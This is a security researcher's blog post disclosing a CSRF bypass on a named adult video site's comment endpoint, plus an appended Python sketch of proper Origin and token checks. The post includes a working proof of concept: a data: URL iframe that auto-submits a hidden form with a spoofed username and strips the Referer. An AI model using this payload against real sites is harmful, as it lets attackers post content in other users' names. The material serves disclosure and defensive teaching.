@zseano
UK Security Researcher



A site containing various blog posts, tutorials, tools and information regarding working with me.




CSRF 'protection' bypass on xvideos



When commenting on a video on xvideos, no CSRF token is sent at all. The request is:

POST http://www.xvideos.com/video-post-comment/video_id/ HTTP/1.1

user=testuser&comment=testy&test=ok

We can actually spoof user= to be whatever we want. However, xvideos checks whether the Referer: header is xvideos.com or blank. If it's blank, it'll let the request through.

But how can we send a blank Referer? This is where our trusty friend data: comes into play.

If you visit data:text/html, <script>top.location.href='http://www.google.com/';</script> in Chrome, it'll redirect with no Referer header and an Origin of null.

So let's create an iframe with a data: URL containing our form, which submits the comment (replace video_here with the video id below).

<iframe src='data:text/html,<html>
  <head>
    <script>
      function doit() { document.getElementById("myForm").submit(); }
      setTimeout(doit,2000);
    </script>
  </head>
  <div style="display:none;">
    <iframe id="myframe" name="myframe"></iframe>
    <form id="myForm" name="myForm" action="http://www.xvideos.com/video-post-comment/video_here/" method="POST" target="myframe">
      <input type="text" name="user" value="testuser"></input>
      <input type="text" name="comment" value="testy"></input>
      <input type="text" name="test" value="ok"></input>
    </form>
  </div>'></iframe>

The request:
[screenshot of the submitted request, not reproduced here]

The response:
[screenshot of the server response, not reproduced here]

Notice that thanks to data:, the Referer header isn't there and Origin is "null", so xvideos let it through. :)

Just checking the Referer: header is a bad approach to protecting against CSRF!
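As an added example (not code from this post or from xvideos), here is the fail-open Referer check the post describes next to a fail-closed check that rejects a missing Referer/Origin or a "null" Origin and also requires a per-session token; the hostnames, header dicts and token value are constructed for the demo.

```python
from urllib.parse import urlsplit
import hmac

# Hypothetical first-party hosts for the site being protected.
ALLOWED_HOSTS = {"www.example.com", "example.com"}


def weak_referer_check(headers: dict) -> bool:
    """The check the post describes: allow if Referer is first-party OR absent."""
    referer = headers.get("Referer")
    if not referer:
        return True  # the hole: data: URLs and other referer-stripping contexts land here
    return urlsplit(referer).hostname in ALLOWED_HOSTS


def strict_origin_check(headers: dict) -> bool:
    """Fail closed: require Origin (or Referer) and require a first-party host.
    An Origin of 'null' (data: URL, sandboxed iframe) is unknown, so it is rejected."""
    origin = headers.get("Origin")
    if origin:
        if origin == "null":
            return False
        return urlsplit(origin).hostname in ALLOWED_HOSTS
    referer = headers.get("Referer")
    if referer:
        return urlsplit(referer).hostname in ALLOWED_HOSTS
    return False  # neither header present: same-origin cannot be proven, deny


def token_check(form: dict, session_token: str) -> bool:
    """Synchronizer token: the form must carry the token bound to the session."""
    return hmac.compare_digest(form.get("csrf_token", ""), session_token)


def accept_comment(headers: dict, form: dict, session_token: str) -> bool:
    """Header check and token check must both pass before the comment is stored."""
    return strict_origin_check(headers) and token_check(form, session_token)


# Constructed sample requests: the data:-iframe submission and a genuine one.
SESSION_TOKEN = "s3ss10n-t0k3n-example"
FORGED = {"headers": {"Origin": "null"},
          "form": {"user": "testuser", "comment": "testy", "test": "ok"}}
LEGIT = {"headers": {"Origin": "http://www.example.com",
                     "Referer": "http://www.example.com/video/1"},
         "form": {"user": "testuser", "comment": "testy", "test": "ok",
                  "csrf_token": SESSION_TOKEN}}
```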